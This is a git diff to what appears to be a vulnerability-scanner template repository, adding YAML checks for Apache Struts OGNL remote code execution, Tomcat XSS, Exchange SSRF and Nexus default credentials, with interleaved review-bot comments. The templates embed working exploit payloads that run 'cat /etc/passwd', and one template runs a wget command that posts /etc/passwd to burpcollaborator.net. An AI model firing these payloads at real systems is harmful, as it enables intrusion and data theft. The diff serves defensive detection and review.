diff --git a/README.md b/README.md index 82d6b5e71c..11188aebd6 100644 --- a/README.md +++ b/README.md @@ -37,13 +37,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ | -| cves | 221 | vulnerabilities | 105 | exposed-panels | 95 | -| exposures | 60 | technologies | 50 | misconfiguration | 50 | -| workflows | 23 | miscellaneous | 16 | default-logins | 17 | +| cves | 229 | vulnerabilities | 105 | exposed-panels | 100 | +| exposures | 60 | technologies | 50 | misconfiguration | 51 | +| workflows | 23 | miscellaneous | 16 | default-logins | 18 | | exposed-tokens | 9 | dns | 6 | fuzzing | 4 | | helpers | 2 | takeovers | 1 | - | - | -**69 directories, 672 files**. +**72 directories, 687 files**. diff --git a/cves/2007/CVE-2007-4556.yaml b/cves/2007/CVE-2007-4556.yaml new file mode 100644 index 0000000000..0d3b5af374 --- /dev/null +++ b/cves/2007/CVE-2007-4556.yaml 
@@ -0,0 +1,29 @@ +id: CVE-2007-4556 + +info: + name: Apache Struts2 S2-001 RCE + author: pikpikcu + severity: critical + reference: https://www.guildhab.top/?p=2326 + tags: cve,cve2007,apache,rce,struts + +requests: + - method: POST + path: + - "{{BaseURL}}/login.action" + headers: + Content-Type: application/x-www-form-urlencoded + body: | + username=test&password=%25%7B%23a%3D%28new+java.lang.ProcessBuilder%28new+java.lang.String%5B%5D%7B%22cat%22%2C%22%2Fetc%2Fpasswd%22%7D%29%29.redirectErrorStream%28true%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew+java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew+java.io.BufferedReader%28%23c%29%2C%23e%3Dnew+char%5B50000%5D%2C%23d.read%28%23e%29%2C%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C%23f.getWriter%28%29.println%28new+java.lang.String%28%23e%29%29%2C%23f.getWriter%28%29.flush%28%29%2C%23f.getWriter%28%29.close%28%29%7D + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:[x*]:0:0" + part: body + + - type: status + status: + - 200 diff --git a/cves/2012/CVE-2012-0392.yaml b/cves/2012/CVE-2012-0392.yaml new file mode 100644 index 0000000000..05a2156fae --- /dev/null +++ b/cves/2012/CVE-2012-0392.yaml 
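Review bot: The new `info:` block in cves/2007/CVE-2007-4556.yaml has no `description`, and the only positive signal is the `root:[x*]:0:0` regex, so a vulnerable Struts instance on a non-Unix host will be reported as clean. The same applies to the other Struts templates added in this commit (CVE-2012-0392, CVE-2013-1965, CVE-2017-12611, CVE-2017-9791, CVE-2018-11776). I would add a one-line `description:` naming the affected component, plus a comment above the matchers such as `# matches /etc/passwd output only; Windows targets are not detected`. That keeps operators from reading a negative result as proof of patching.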
@@ -0,0 +1,24 @@ +id: CVE-2012-0392 + +info: + name: Apache Struts2 S2-008 RCE + author: pikpikcu + severity: critical + reference: https://blog.csdn.net/weixin_43416469/article/details/113850545 + tags: cve, cve2012,apache,rce,struts + +requests: + - method: GET + path: + - "{{BaseURL}}/devmode.action?debug=command&expression=(%23_memberAccess[%22allowStaticMethodAccess%22]%3Dtrue%2C%23foo%3Dnew%20java.lang.Boolean(%22false%22)%20%2C%23context[%22xwork.MethodAccessor.denyMethodExecution%22]%3D%23foo%2C@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%27cat%20/etc/passwd%27).getInputStream()))" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:[x*]:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2013/CVE-2013-1965.yaml b/cves/2013/CVE-2013-1965.yaml new file mode 100644 index 0000000000..b39b275ce9 --- /dev/null +++ b/cves/2013/CVE-2013-1965.yaml 
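Review bot: The `tags:` value in cves/2012/CVE-2012-0392.yaml has a space after the first comma (`cve, cve2012,...`). If the consumer does not trim entries, that leaves a tag with a leading space, and a run filtered on `cve2012` may skip this template. Write it as `tags: cve,cve2012,apache,rce,struts`. The file also ends without a trailing newline (`\ No newline at end of file`), which this same commit corrects for exposed-hg.yaml.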
@@ -0,0 +1,28 @@ +id: CVE-2013-1965 + +info: + name: Apache Struts2 S2-012 RCE + author: pikpikcu + severity: critical + reference: https://nvd.nist.gov/vuln/detail/CVE-2013-1965 + tags: cve,cve2013,apache,rce,struts + +requests: + - method: POST + path: + - "{{BaseURL}}/user.action" + headers: + Content-Type: application/x-www-form-urlencoded + body: | + name=%25%7B%23a%3D%28new+java.lang.ProcessBuilder%28new+java.lang.String%5B%5D%7B%22cat%22%2C+%22%2Fetc%2Fpasswd%22%7D%29%29.redirectErrorStream%28true%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew+java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew+java.io.BufferedReader%28%23c%29%2C%23e%3Dnew+char%5B50000%5D%2C%23d.read%28%23e%29%2C%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C%23f.getWriter%28%29.println%28new+java.lang.String%28%23e%29%29%2C%23f.getWriter%28%29.flush%28%29%2C%23f.getWriter%28%29.close%28%29%7D + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:[x*]:0:0" + + - type: status + status: + - 200 diff --git a/cves/2013/CVE-2013-2251.yaml b/cves/2013/CVE-2013-2251.yaml index 591593f19b..7bce805f94 100644 --- a/cves/2013/CVE-2013-2251.yaml +++ b/cves/2013/CVE-2013-2251.yaml @@ -5,7 +5,7 @@ info: author: exploitation & @dwisiswant0 severity: critical description: In Struts 2 before 2.3.15.1 the information following "action:", "redirect:" or "redirectAction:" is not properly sanitized. Since said information will be evaluated as OGNL expression against the value stack, this introduces the possibility to inject server side code. - tags: cve,cve2013,rce + tags: cve,cve2013,rce,struts,apache requests: - payloads: diff --git a/cves/2016/CVE-2016-3081.yaml b/cves/2016/CVE-2016-3081.yaml index de0e0dd738..1e15993eb2 100644 --- a/cves/2016/CVE-2016-3081.yaml +++ b/cves/2016/CVE-2016-3081.yaml 
@@ -1,11 +1,11 @@ id: CVE-2016-3081 info: - name: S2-032 Struts RCE + name: Apache S2-032 Struts RCE author: dhiyaneshDK severity: high reference: https://cwiki.apache.org/confluence/display/WW/S2-032 - tags: cve,cve2016,struts,rce + tags: cve,cve2016,struts,rce,apache requests: - raw: diff --git a/cves/2017/CVE-2017-12611.yaml b/cves/2017/CVE-2017-12611.yaml new file mode 100644 index 0000000000..08f492bb34 --- /dev/null +++ b/cves/2017/CVE-2017-12611.yaml @@ -0,0 +1,24 @@ +id: CVE-2017-12611 + +info: + name: Apache Struts2 S2-053 RCE + author: pikpikcu + severity: critical + reference: https://nvd.nist.gov/vuln/detail/CVE-2017-12611 + tags: cve,cve2017,apache,rce,struts + +requests: + - method: POST + path: + - "{{BaseURL}}/?name=%25%7B%28%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%29.%28%23_memberAccess%3F%28%23_memberAccess%3D%23dm%29%3A%28%28%23container%3D%23context%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ognlUtil%3D%23container.getInstance%28%40com.opensymphony.xwork2.ognl.OgnlUtil%40class%29%29.%28%23ognlUtil.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ognlUtil.getExcludedClasses%28%29.clear%28%29%29.%28%23context.setMemberAccess%28%23dm%29%29%29%29.%28%23cmd%3D%27cat%20/etc/passwd%27%29.%28%23iswin%3D%28%40java.lang.System%40getProperty%28%27os.name%27%29.toLowerCase%28%29.contains%28%27win%27%29%29%29.%28%23cmds%3D%28%23iswin%3F%7B%27cmd.exe%27%2C%27/c%27%2C%23cmd%7D%3A%7B%27/bin/bash%27%2C%27-c%27%2C%23cmd%7D%29%29.%28%23p%3Dnew%20java.lang.ProcessBuilder%28%23cmds%29%29.%28%23p.redirectErrorStream%28true%29%29.%28%23process%3D%23p.start%28%29%29.%28%40org.apache.commons.io.IOUtils%40toString%28%23process.getInputStream%28%29%29%29%7D" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:[x*]:0:0" + + - type: status + status: + - 200 diff --git a/cves/2017/CVE-2017-5638.yaml b/cves/2017/CVE-2017-5638.yaml index 615cf36cac..11d7004986 100644 --- a/cves/2017/CVE-2017-5638.yaml 
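Review bot: The request in cves/2017/CVE-2017-12611.yaml is declared `method: POST` but carries the `name` parameter in the query string and has neither `body` nor `Content-Type`, unlike the other POST templates in this commit. If the query-string form is what is intended, `method: GET` states that plainly and avoids proxies or WAFs treating a body-less POST differently. Otherwise, move the parameter into a form body with `Content-Type: application/x-www-form-urlencoded`. Which form actually triggers evaluation should be confirmed on a lab instance; I cannot tell from the hunk alone.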
+++ b/cves/2017/CVE-2017-5638.yaml @@ -1,10 +1,10 @@ id: CVE-2017-5638 info: - author: "Random Robbie" - name: "Struts2 RCE " + author: Random Robbie + name: Apache Struts2 RCE severity: critical description: Struts is vulnerable to remote command injection attacks through incorrectly parsing an attacker’s invalid Content-Type HTTP header. The Struts vulnerability allows these commands to be executed under the privileges of the Web server. - tags: cve,cve2017,struts,rce + tags: cve,cve2017,struts,rce,apache # This template supports the detection part only. # Do not test any website without permission diff --git a/cves/2017/CVE-2017-9791.yaml b/cves/2017/CVE-2017-9791.yaml new file mode 100644 index 0000000000..d627ab66e8 --- /dev/null +++ b/cves/2017/CVE-2017-9791.yaml 
@@ -0,0 +1,33 @@ +id: CVE-2017-9791 + +info: + name: Apache Struts2 S2-053 RCE + author: pikpikcu + severity: critical + reference: https://nvd.nist.gov/vuln/detail/CVE-2017-9791 + tags: cve, cve2017,apache,rce + +requests: + - method: POST + path: + - "{{BaseURL}}/integration/saveGangster.action" + headers: + Content-Type: application/x-www-form-urlencoded + body: | + name=%25%7b%28%23%64%6d%3d%40%6f%67%6e%6c%2e%4f%67%6e%6c%43%6f%6e%74%65%78%74%40%44%45%46%41%55%4c%54%5f%4d%45%4d%42%45%52%5f%41%43%43%45%53%53%29%2e%28%23%5f%6d%65%6d%62%65%72%41%63%63%65%73%73%3f%28%23%5f%6d%65%6d%62%65%72%41%63%63%65%73%73%3d%23%64%6d%29%3a%28%28%23%63%6f%6e%74%61%69%6e%65%72%3d%23%63%6f%6e%74%65%78%74%5b%27%63%6f%6d%2e%6f%70%65%6e%73%79%6d%70%68%6f%6e%79%2e%78%77%6f%72%6b%32%2e%41%63%74%69%6f%6e%43%6f%6e%74%65%78%74%2e%63%6f%6e%74%61%69%6e%65%72%27%5d%29%2e%28%23%6f%67%6e%6c%55%74%69%6c%3d%23%63%6f%6e%74%61%69%6e%65%72%2e%67%65%74%49%6e%73%74%61%6e%63%65%28%40%63%6f%6d%2e%6f%70%65%6e%73%79%6d%70%68%6f%6e%79%2e%78%77%6f%72%6b%32%2e%6f%67%6e%6c%2e%4f%67%6e%6c%55%74%69%6c%40%63%6c%61%73%73%29%29%2e%28%23%6f%67%6e%6c%55%74%69%6c%2e%67%65%74%45%78%63%6c%75%64%65%64%50%61%63%6b%61%67%65%4e%61%6d%65%73%28%29%2e%63%6c%65%61%72%28%29%29%2e%28%23%6f%67%6e%6c%55%74%69%6c%2e%67%65%74%45%78%63%6c%75%64%65%64%43%6c%61%73%73%65%73%28%29%2e%63%6c%65%61%72%28%29%29%2e%28%23%63%6f%6e%74%65%78%74%2e%73%65%74%4d%65%6d%62%65%72%41%63%63%65%73%73%28%23%64%6d%29%29%29%29%2e%28%23%71%3d%40%6f%72%67%2e%61%70%61%63%68%65%2e%63%6f%6d%6d%6f%6e%73%2e%69%6f%2e%49%4f%55%74%69%6c%73%40%74%6f%53%74%72%69%6e%67%28%40%6a%61%76%61%2e%6c%61%6e%67%2e%52%75%6e%74%69%6d%65%40%67%65%74%52%75%6e%74%69%6d%65%28%29%2e%65%78%65%63%28%27%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%27%29%2e%67%65%74%49%6e%70%75%74%53%74%72%65%61%6d%28%29%29%29%2e%28%23%71%29%7d&age=10&__checkbox_bustedBefore=true&description= + + matchers-condition: and + matchers: + - type: word + words: + - "Content-Type: text/html" + part: header + + - 
type: regex + regex: + - "root:[x*]:0:0" + condition: and + + - type: status + status: + - 200 diff --git a/cves/2017/CVE-2017-9805.yaml b/cves/2017/CVE-2017-9805.yaml new file mode 100644 index 0000000000..5a1193818f --- /dev/null +++ b/cves/2017/CVE-2017-9805.yaml @@ -0,0 +1,87 @@ +id: CVE-2017-9805 + +info: + name: Apache Struts2 S2-052 RCE + author: pikpikcu + severity: critical + reference: https://nvd.nist.gov/vuln/detail/CVE-2017-9805 + tags: cve,cve2017,apache,rce,struts + +requests: + - method: POST + path: + - "{{BaseURL}}/struts2-rest-showcase/orders/3" + - "{{BaseURL}}/orders/3" + headers: + Content-Type: application/xml + body: | + + + + 0 + + + + + + false + 0 + + + + + + wget + --post-file + /etc/passwd + burpcollaborator.net + + false + + + + + java.lang.ProcessBuilder + start + + + asdasd + + asdasd + + + + + + false + 0 + 0 + false + + false + + + + 0 + + + + + + + + + + + matchers-condition: and + matchers: + + - type: word + words: + - "Debugging information" + - "com.thoughtworks.xstream.converters.collections.MapConverter" + condition: and + + - type: status + status: + - 500 diff --git a/cves/2018/CVE-2018-11776.yaml b/cves/2018/CVE-2018-11776.yaml new file mode 100644 index 0000000000..220780dedd --- /dev/null +++ b/cves/2018/CVE-2018-11776.yaml 
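Review bot: `name: Apache Struts2 S2-053 RCE` in cves/2017/CVE-2017-9791.yaml duplicates the name given to CVE-2017-12611 in this same commit. CVE-2017-9791 is the Struts 1 plugin issue published as S2-048, so findings from the two templates would be indistinguishable in a report. Suggest `name: Apache Struts2 S2-048 RCE` and `tags: cve,cve2017,apache,rce,struts`; the current tag line omits `struts`, which this commit adds to the other Struts templates. The `condition: and` under the single-entry regex matcher has no effect and can be dropped.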
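Review bot: The command embedded in the body of cves/2017/CVE-2017-9805.yaml runs `wget --post-file /etc/passwd` against `burpcollaborator.net`, so a successful check uploads the target's account file to a third-party host that neither the scanner operator nor the system owner controls. The matchers never use that callback: they key only on the 500 status and the `Debugging information` / `MapConverter` text. The command arguments should be replaced with something that reads and transmits no data, or the destination made an operator-supplied value. It is also worth confirming on a patched instance that the same 500 debugging response is not returned there, since that would turn this into a false-positive source. The XML markup of the body is not visible in this rendering, so the exact lines cannot be quoted.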
@@ -0,0 +1,24 @@ +id: CVE-2018-11776 + +info: + name: Apache Struts2 S2-057 RCE + author: pikpikcu + severity: critical + reference: https://github.com/jas502n/St2-057 + tags: cve,cve2018,apache,rce,struts2 + +requests: + - method: GET + path: + - "{{BaseURL}}/%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27cat%20/etc/passwd%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D/actionChain1.action" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:[x*]:0:0" + + - type: status + status: + - 200 diff --git a/cves/2019/CVE-2019-0221.yaml b/cves/2019/CVE-2019-0221.yaml new file mode 100644 index 0000000000..90b1081257 --- /dev/null +++ b/cves/2019/CVE-2019-0221.yaml @@ -0,0 +1,34 @@ +id: CVE-2019-0221 + +info: + name: Apache Tomcat XSS + author: pikpikcu + severity: low + reference: https://nvd.nist.gov/vuln/detail/CVE-2019-0221 + description: | + The SSI printenv command in Apache Tomcat 9.0.0.M1 to 9.0.0.17, 8.5.0 to 8.5.39 and + 7.0.0 to 7.0.93 echoes user provided data without escaping and is, + therefore, vulnerable to XSS. SSI is disabled by default. + The printenv command is intended for debugging and is unlikely to be present in a production website. + tags: cve,cve2019,apache,xss + +requests: + - method: GET + path: + - "{{BaseURL}}/printenv.shtml?%3Cscript%3Ealert(%27xss%27)%3C/script%3E" + + matchers-condition: and + matchers: + + - type: word + words: + - "" + + - type: word + words: + - "text/html" + part: header + + - type: status + status: + - 200 diff --git a/cves/2020/CVE-2020-12116.yaml b/cves/2020/CVE-2020-12116.yaml index 80f6378499..c002797d46 100644 
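Review bot: cves/2018/CVE-2018-11776.yaml is tagged `struts2`, while every other Struts template touched by this commit uses `struts`. A run filtered on the `struts` tag would therefore skip this one. Use `tags: cve,cve2018,apache,rce,struts` so the tag set the commit is normalising stays consistent.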
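Review bot: In cves/2019/CVE-2019-0221.yaml the first word matcher is shown as an empty string (`- ""`), which matches every response body. With that, the template would flag any 200 `text/html` response on `/printenv.shtml`. The markup may simply have been lost in this rendering, so check the file. The word should be the literal payload sent in the path, `<script>alert('xss')</script>`, with `part: body` stated explicitly, so that a match proves the input was reflected unescaped rather than HTML-encoded.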
--- a/cves/2020/CVE-2020-12116.yaml +++ b/cves/2020/CVE-2020-12116.yaml @@ -6,9 +6,7 @@ info: severity: high description: Zoho ManageEngine OpManager Stable build before 124196 and Released build before 125125 allows an unauthenticated attacker to read arbitrary files on the server by sending a crafted request. tags: cve,cve2020,zoho,traversal - - # References: - # - https://github.com/BeetleChunks/CVE-2020-12116 + reference: https://github.com/BeetleChunks/CVE-2020-12116 requests: - raw: diff --git a/cves/2020/CVE-2020-14815.yaml b/cves/2020/CVE-2020-14815.yaml deleted file mode 100644 index 1f227cef61..0000000000 --- a/cves/2020/CVE-2020-14815.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: CVE-2020-14815 - -info: - name: Oracle Business Intelligence XSS - author: pikpikcu - severity: medium - reference: https://www.oracle.com/security-alerts/cpuoct2020.html - tags: cve,cve2020,oracle,xss - source: https://twitter.com/HackerOn2Wheels/status/1326927875279380480 - -requests: - - method: GET - path: - - "{{BaseURL}}/bi-security-login/login.jsp?msi=false&redirect=%22%3E%3Cimg/src/onerror%3dalert(document.domain)%3E" - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - words: - - "X-Oracle-Dms-Ecid:" - - "X-Oracle-Dms-Rid:" - - "Set-Cookie:" - part: header - condition: and \ No newline at end of file diff --git a/cves/2020/CVE-2020-17530.yaml b/cves/2020/CVE-2020-17530.yaml index 38c7823e00..9de289e9fe 100644 --- a/cves/2020/CVE-2020-17530.yaml +++ b/cves/2020/CVE-2020-17530.yaml @@ -5,7 +5,7 @@ info: author: pikpikcu severity: critical reference: http://packetstormsecurity.com/files/160721/Apache-Struts-2-Forced-Multi-OGNL-Evaluation.html - tags: cve,cve2020,apache,rce + tags: cve,cve2020,apache,rce,struts # Forced OGNL evaluation, when evaluated on raw user input in tag attributes, # may lead to remote code execution. Affected software : Apache Struts 2.0.0 - Struts 2.5.25. 
diff --git a/cves/2021/CVE-2021-26855.yaml b/cves/2021/CVE-2021-26855.yaml new file mode 100644 index 0000000000..f07e465fe3 --- /dev/null +++ b/cves/2021/CVE-2021-26855.yaml @@ -0,0 +1,34 @@ +id: CVE-2021-26855 + +info: + name: Exchange Server SSRF Vulnerability + author: madrobot + severity: critical + description: | + Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-26412, CVE-2021-26854, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065, CVE-2021-27078. + tags: cve,cve2021,ssrf,rce,exchange + reference: | + - https://proxylogon.com/#timeline + - https://raw.githubusercontent.com/microsoft/CSS-Exchange/main/Security/http-vuln-cve2021-26855.nse + - https://www.shodan.io/search?query=vuln%3ACVE-2021-26855 + - https://gist.github.com/testanull/324546bffab2fe4916d0f9d1f03ffa09 + +requests: + - raw: + - | + GET /owa/auth/x.js HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 + Cookie: X-AnonResource=true; X-AnonResource-Backend=burpcollaborator.net/ecp/default.flt?~3; X-BEResource=localhost/owa/auth/logon.aspx?~3; + Accept-Language: en + Connection: close + + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "Burp Collaborator Server" + part: body \ No newline at end of file diff --git a/cves/2021/CVE-2021-3378.yaml b/cves/2021/CVE-2021-3378.yaml index 4829a293a3..f39c826555 100644 --- a/cves/2021/CVE-2021-3378.yaml +++ b/cves/2021/CVE-2021-3378.yaml @@ -24,7 +24,7 @@ requests: ------WebKitFormBoundarySHHbUsfCoxlX1bpS Content-Disposition: form-data; name="file"; filename="poc.txt" - Content-Type: imnage/png + Content-Type: image/png POC_TEST diff --git a/default-logins/nexus/nexus-default-password.yaml b/default-logins/nexus/nexus-default-password.yaml new file mode 100644 index 0000000000..aecb665d44 --- /dev/null +++ b/default-logins/nexus/nexus-default-password.yaml 
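Review bot: The `Cookie` header in cves/2021/CVE-2021-26855.yaml hard-codes `burpcollaborator.net` as the `X-AnonResource-Backend` host, and the only content matcher is that service's banner, `Burp Collaborator Server`. Detection therefore depends on a third party staying reachable and keeping that page text, and an Exchange server with restricted egress is reported clean even when unpatched. Every scan also discloses the target's outbound address to that host. Where the engine version supports it, an operator-controlled callback such as `{{interactsh-url}}` is preferable. Failing that, add a comment like `# negative result is inconclusive when the server cannot reach the internet`. Separately, `reference: |` followed by `- ` lines yields one multi-line string rather than a list, and the file has no trailing newline.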
@@ -0,0 +1,31 @@ +id: nexus-default-password + +info: + name: Nexus Default Password + author: pikpikcu + severity: high + tags: nexus,dlogin + +requests: + - raw: + - | + POST /service/rapture/session HTTP/1.1 + Host: {{Hostname}} + Content-Length: 43 + X-Nexus-UI: true + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + Connection: close + + username=YWRtaW4%3D&password=YWRtaW4xMjM%3D + + matchers-condition: and + matchers: + - type: status + status: + - 204 + - type: word + words: + - "Server: Nexus" + - "NXSESSIONID" + part: header + condition: and diff --git a/exposures/configs/exposed-hg.yaml b/exposures/configs/exposed-hg.yaml index eb1cdf46bd..9f0e619a3b 100644 --- a/exposures/configs/exposed-hg.yaml +++ b/exposures/configs/exposed-hg.yaml @@ -10,6 +10,7 @@ requests: path: - "{{BaseURL}}/.hg/hgrc" + matchers-condition: and matchers: - type: word words: @@ -19,4 +20,4 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/exposures/configs/phpinfo.yaml b/exposures/configs/phpinfo.yaml index e49e256cce..ecc7dabbdc 100644 --- a/exposures/configs/phpinfo.yaml +++ b/exposures/configs/phpinfo.yaml @@ -2,7 +2,7 @@ id: phpinfo-files info: name: phpinfo Disclosure - author: pd-team & daffainfo + author: pd-team & daffainfo & meme-lord severity: low requests: @@ -25,9 +25,22 @@ requests: - "{{BaseURL}}/infos.php" - "{{BaseURL}}/linusadmin-phpinfo.php" - "{{BaseURL}}/php-info.php" + + matchers-condition: and matchers: - type: word words: - "PHP Extension" - "PHP Version" condition: and + + - type: status + status: + - 200 + + extractors: + - type: regex + part: body + group: 1 + regex: + - '>PHP Version <\/td>([0-9.]+)' \ No newline at end of file diff --git a/exposures/logs/struts-debug-mode.yaml b/exposures/logs/struts-debug-mode.yaml index d72731b366..3371fb9fca 100644 --- a/exposures/logs/struts-debug-mode.yaml +++ b/exposures/logs/struts-debug-mode.yaml 
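Review bot: The raw request in default-logins/nexus/nexus-default-password.yaml pins `Content-Length: 43`, which is correct for the current body but will silently break the request if the credentials line is ever edited. I would drop the header if the engine computes it for raw requests, or else add `# keep in sync with the body below`. The two form values are base64, which hides from a reader what is being tried. A comment such as `# username/password are base64 of admin / admin123` above the request, plus a `reference:` to the vendor's default-credential documentation, would make the finding easier to triage and remediate.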
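Review bot: The new version of exposures/configs/phpinfo.yaml ends without a trailing newline (`\ No newline at end of file` after the extractor regex), the same problem this commit fixes in exposed-hg.yaml. As rendered here, the extractor pattern goes directly from `<\/td>` to the capture group `([0-9.]+)`. phpinfo output places the version in its own table cell, so if no opening tag really sits between them in the file, the extractor would return nothing; please verify against a real page. The `info:` block also still has no `tags:` line, unlike the other templates touched here.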
@@ -4,7 +4,7 @@ info: name: Apache Struts setup in Debug-Mode author: pd-team severity: low - tags: logs,struts + tags: logs,struts,apache requests: - method: GET diff --git a/misconfiguration/gitlab-snippets.yaml b/misconfiguration/gitlab-snippets.yaml new file mode 100644 index 0000000000..b3253b81a2 --- /dev/null +++ b/misconfiguration/gitlab-snippets.yaml @@ -0,0 +1,21 @@ +id: gitlab-snippets +info: + name: GitLab public snippets + author: pdteam + severity: info + reference: https://gist.github.com/vysecurity/20311c29d879e0aba9dcffbe72a88b10 + +requests: + - method: GET + path: + - "{{BaseURL}}/explore/snippets" + + matchers-condition: and + matchers: + - type: word + words: + - 'Snippets · Explore · GitLab' + + - type: status + status: + - 200 \ No newline at end of file diff --git a/technologies/microsoft-echange-server-detect.yaml b/technologies/microsoft-echange-server-detect.yaml index d06d3b6aa9..b89745b772 100644 --- a/technologies/microsoft-echange-server-detect.yaml +++ b/technologies/microsoft-echange-server-detect.yaml @@ -1,4 +1,4 @@ -id: microsoft-echange-server-detect +id: microsoft-exchange-server-detect info: name: Microsoft Exchange Server Detect
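Review bot: misconfiguration/gitlab-snippets.yaml has no `tags:` entry, so tag-filtered runs will never select it, and `author: pdteam` differs from the `pd-team` spelling used in phpinfo.yaml and struts-debug-mode.yaml in this same commit. Suggest adding `tags: gitlab,misconfig` (or whatever the project's convention is) and normalising the author. The single word matcher is the page title `Snippets · Explore · GitLab`, which presumably renders even when the list is empty. If so, a hit means the explore page is reachable anonymously, not that any snippet is exposed; a `description:` saying that would set the right expectation for triage. The file also lacks a trailing newline and the blank line between `id:` and `info:` that the other templates use.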